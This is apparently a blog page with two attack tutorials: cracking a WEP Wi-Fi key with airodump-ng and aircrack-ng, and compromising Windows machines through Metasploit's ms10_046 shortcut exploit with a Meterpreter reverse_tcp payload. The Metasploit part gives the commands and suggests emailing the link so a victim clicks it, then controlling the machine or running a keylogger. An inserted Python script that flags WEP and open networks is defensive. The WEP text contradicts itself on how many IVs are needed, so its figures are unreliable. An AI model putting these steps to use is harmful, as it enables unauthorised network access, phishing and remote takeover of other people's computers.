Cracking WEP Encryption With Kali Linux

In this tutorial we will see how easy it is to crack WEP encryption on a wireless access point. WEP is now very outdated, after its weaknesses were exposed. However, you will still find some access points using WEP, and for educational purposes I wish to demonstrate how easy it is to break, which should encourage you to switch to WPA if you haven't done so already.

It is also a good starting point for you to learn the basics of how to use the airodump-ng and aircrack-ng tools from the terminal window.

I'm using the Kali Linux distribution, which comes with these tools already installed. If you haven't done so already, I advise you to download and set up a USB live drive running Kali Linux. If you're a Mac user you will find this tutorial useful, as I also address the wireless driver issues that frequently plague Mac users trying to run aircrack.

STEP 1
First we will run airodump-ng to scan for available wireless networks and identify one running WEP that we wish to connect to.

As you can see there are several networks with WEP available; we will target the last in the list. Press Ctrl+C to stop airodump and run the following command:
airodump-ng -w <directory to write the file to> -c <channel number> --bssid <MAC of target access point> <wireless interface>

As you can see I am saving the captured packets to a local directory on my system, and I set the channel and BSSID to the channel and BSSID indicated in our initial scan. Finally, as I am using a Mac I have the prism0 wireless interface, which is being used for wireless monitoring. If you're on another machine I assume you have already enabled monitor mode with the airmon-ng command.

When you hit enter airodump will begin gathering packets and writing them to the capture file. You will need to capture around 10,000 IVs before it will be possible to start cracking the WEP encryption; typically I have found I need around 2,000 IVs to be successful.
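As an added example (not part of the original tutorial), the Python script below reads the CSV summary that airodump-ng writes next to its capture file and lists every access point that still runs WEP or no encryption, so you can audit your own networks for the WPA migration the introduction recommends. The column layout is my assumption about the airodump-ng CSV format, and the rows in SAMPLE_CSV are constructed sample data.

```python
# Added audit example (not from the tutorial): read the <prefix>-01.csv summary
# that airodump-ng writes next to its capture and list every access point that
# still uses WEP or no encryption. Column layout is assumed; rows are constructed.
import csv

SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,    0,   0.  0.  0.  0,   6, Office, 
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WEP , WEP, , -60,   98, 2310,   0.  0.  0.  0,   8, OldPrint, 
AA:BB:CC:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN , , , -70,   40,    0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DD:EE:FF:00:00:09, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50,  300, AA:BB:CC:00:00:02, OldPrint
"""

WEAK_PRIVACY = {"WEP", "OPN"}  # should not appear on any network you manage


def parse_access_points(text):
    """Return one dict per access point row; the station section is skipped."""
    aps, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break  # blank line after the AP rows starts the station section
            continue  # airodump-ng writes a blank line before the AP header
        fields = [f.strip() for f in next(csv.reader([line]))]
        if header is None:
            if fields[0] == "BSSID":
                header = fields
            continue
        aps.append(dict(zip(header, fields)))
    return aps


def flag_weak_networks(aps):
    """Return (ESSID, BSSID, privacy, IVs seen) for WEP and open access points.

    The IV column counts WEP data frames observed during the scan; the tutorial
    needs only a few thousand of these, so a busy WEP AP is already exposed."""
    return [(ap["ESSID"], ap["BSSID"], ap["Privacy"], int(ap["# IV"] or 0))
            for ap in aps if ap["Privacy"] in WEAK_PRIVACY]


if __name__ == "__main__":
    for essid, bssid, privacy, ivs in flag_weak_networks(parse_access_points(SAMPLE_CSV)):
        print(f"{essid:<10} {bssid} {privacy:<4} IVs seen: {ivs:>5}  -> migrate to WPA2/WPA3")
```

Point it at the real <prefix>-01.csv from your own scan by replacing SAMPLE_CSV with the file's contents.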

STEP 2
Leave the terminal window open with airodump capturing packets, and start a new terminal window. Here we will run aircrack-ng with the following command:
aircrack-ng <path to the capture file>

When you hit enter aircrack-ng will open the capture file and begin trying to crack the WEP encryption. If successful it will display the result in hexadecimal. If it's not successful it will indicate that not enough IVs have been captured. Simply leave the window open; it will automatically retry when the next 5k IVs have been captured.

When you have finally captured enough IVs it will display the successfully cracked password in hexadecimal format. You can use an online converter tool to convert this to ASCII characters if you wish, or enter the hex without the : separators.

Windows Attack With Metasploit Tutorial

In this tutorial we will be exploiting a vulnerability within Windows related to the icon_dllloader. This will allow us to deliver the Meterpreter payload, which gives us access to the target machine and would allow us to run a key logger service, for example.

PREREQUISITES
In order to begin this tutorial you should already be familiar with the basics of the Metasploit framework. If you don't already know how to start the database service and get the Metasploit console operational, then I advise you to check out my introduction to Metasploit tutorial here.

STEP 1
After you have started Metasploit with the msfconsole command, we will load our intended module with the following command:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader


STEP 2
Once we have loaded the module, we will set the payload that we intend to deliver. We are going to use the Meterpreter reverse_tcp payload. We will load this with the following command:
set payload windows/meterpreter/reverse_tcp

STEP 3
Now we will set the options for the parameters we need to define in order for our attack to function. We need to set the SRVHOST and the LHOST. We will set both of these to the IP address of the machine we have running Metasploit. In this example we are in the same LAN as the target machine, so we will use our LAN IP address. If you were targeting a remote machine via the internet, for example, then you would need to point these to the public WAN IP address of your router and have port forwarding set up to the Metasploit machine. For ease of demonstration, however, we are attacking a machine in our own LAN, so we will use the local network IP address.
set SRVHOST 192.168.0.8
set LHOST 192.168.0.8


Once we have set these, you can use the show options command to display the settings and make sure everything is set correctly.


STEP 4
Now everything is set up we are ready to rock 'n' roll and start our exploit. Use the command exploit to begin.


You can see that everything has now been set up and the server has been started. This is running as a background job, so simply leave the terminal window open and wait.

Wait for what?? Well, you now need the target machine to trigger the vulnerability in its operating system so that Metasploit can make the connection. As you can see, the terminal window has given us some hints. One easy way is to get the target machine to open the given URL http://192.168.0.8:80/. You could send an e-mail containing a hyperlink in the hope that the receiver will click on it. Once they do, and assuming there's no antivirus running on their machine, it will allow you to make a connection with Meterpreter and gain access to take control of their machine.